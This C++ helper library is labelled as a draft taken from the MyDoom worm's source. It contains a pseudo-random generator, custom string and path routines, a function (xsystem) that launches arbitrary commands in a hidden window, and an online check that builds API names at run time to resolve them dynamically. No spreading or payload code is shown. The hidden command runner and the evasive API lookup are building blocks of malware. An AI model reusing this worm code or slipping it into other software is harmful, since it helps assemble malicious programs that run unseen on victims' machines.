//////////////////////////////////////////////////////////////////////
//
// lib.cpp
//
// draft
//
// from mydoom
//
//////////////////////////////////////////////////////////////////////

//#define WIN32_LEAN_AND_MEAN

#ifndef _SYNC_LIB_CPP_
#define _SYNC_LIB_CPP_

#include <windows.h>
#include <wininet.h>
#include <string.h>

#include "lib.h"

#include <stdio.h>

static DWORD xrand16_seed;

void xrand_init(void)
{
	xrand16_seed = GetTickCount();
}

WORD xrand16(void)
{
	xrand16_seed = 0x015a4e35L * xrand16_seed + 1L;
	return ((WORD)(xrand16_seed >> 16L) & (WORD)0xffff);
}

DWORD xrand32(void)
{
	return xrand16() | (xrand16() << 16);
}

char *xstrstr(const char *str, const char *pat)
{
	const char *p, *q;
	for (; *str; str++) {
		for (p=str, q=pat; *p && *q; p++, q++)
			if (*p != *q) break;
		if (p == q || *q == 0) return (char *)str;
	}
	return NULL;
}

char *xstrrchr(const char *str, char ch)
{
	register char *start = (char *)str;
	while (*str++);
	while (--str != start && *str != ch);
	if (*str == (char)ch) return((char *)str);
	return NULL;
}

char *xstrchr(const char *str, char ch)
{
	while (*str && *str != ch) str++;
	return (*str == ch) ? (char *)str : NULL;
}

int xsystem(char *cmd, int wait)
{
	PROCESS_INFORMATION pi; 
	STARTUPINFO si; 

	ZeroMemory(&si, sizeof(si));
	si.cb = sizeof(si);
	si.dwFlags = STARTF_USESHOWWINDOW | STARTF_FORCEOFFFEEDBACK;
	si.wShowWindow = SW_HIDE;

	if (CreateProcess(0, cmd, 0, 0, TRUE, 0, 0, 0, &si, &pi) == 0)
		return 1;	// FAILED

	if (wait) {
		WaitForSingleObject(pi.hProcess, INFINITE);
		CloseHandle(pi.hThread);
		CloseHandle(pi.hProcess);
	}

	return 0;		// SUCCESS
}

int xmemcmpi(unsigned char *p, unsigned char *q, int len)
{
	while (len--)
		if (tolower(*p++) != tolower(*q++)) return 1;
	return 0;
}

int xstrncmp(const char *first, const char *last, size_t count)
{
        if (!count)
                return(0);

        while (--count && *first && *first == *last)
        {
                first++;
                last++;
        }

        return (*(unsigned char *)first - *(unsigned char *)last);
}

typedef BOOL (WINAPI *WININET_GETCONNECTEDSTATE)(LPDWORD lpdwFlags, DWORD dwReserved);

// Returns: 0=offline, 1=online, 2=don't know 
int is_online(void)
{
	WININET_GETCONNECTEDSTATE pInternetGetConnectedState;
	HINSTANCE hWinInet;
	DWORD igcs_flags;
	char tmp[64];

	ZeroMemory(tmp,64);               
	lstrcat(tmp,"wininet.dll");
	hWinInet = GetModuleHandle(tmp);
	if (hWinInet == NULL || hWinInet == INVALID_HANDLE_VALUE) {
		hWinInet = LoadLibrary(tmp);
		if (hWinInet == NULL || hWinInet == INVALID_HANDLE_VALUE)
			return 2;
	}

	ZeroMemory(tmp,64);
	lstrcat(tmp, "InternetGetConnectedState");
	pInternetGetConnectedState = (WININET_GETCONNECTEDSTATE)GetProcAddress(hWinInet, tmp);
	if (pInternetGetConnectedState == NULL)
		return 2;

	return (pInternetGetConnectedState(&igcs_flags, 0) == 0) ? 0 : 1;
}

int cat_wsprintf(LPTSTR lpOutput, LPCTSTR lpFormat, ...)
{
        register int ret;
        va_list arglist;
        va_start(arglist, lpFormat);
        ret = wvsprintf(lpOutput + lstrlen(lpOutput), lpFormat, arglist);
        va_end(arglist);
        return ret;
}

void path2file_name(char* path, char* file_name)
{
	//
	// get file-name from path 
	// and store it into file_name
	//

	if(!path || !file_name)
		return;

	int i,j=0;
	
	ZeroMemory(file_name,30);

	for(i=lstrlen(path);i>0;i--)
	{
		if(path[i]=='\\')
			break;
	}
	if(i)
	{
		i++; // for '\'
		// put file name into ctemp
		for(j=i;j<lstrlen(path);j++)
			file_name[j-i]=path[j];
	}
}

void path2dir_name(char* path, char* dir_name)
{
	//
	// get dir-name from path 
	// and store it into dir_name
	//
	if(!path || !dir_name)
		return;

	int i,j=0;

	for(i=lstrlen(path);i>0;i--)
	{
		if(path[i]=='\\')
			break;
	}
	if(i)
	{
		i++; // for '\'
		// put file name into ctemp
		for(j=0;j<i;j++)
			dir_name[j]=path[j];
	}
}

void prerr(LPCTSTR _str, ...)
{
	va_list arglist;
	va_start(arglist,_str);
	printf("[!] Error: ");
	vfprintf(stdout,_str,arglist); // stdout
	printf("\n");
	va_end(arglist);
}

double factorial(int n)
{
    if (n > 1)
        return ( n * factorial( n - 1 ));
    return 1;
}


#endif // #ifndef _SYNC_LIB_CPP_
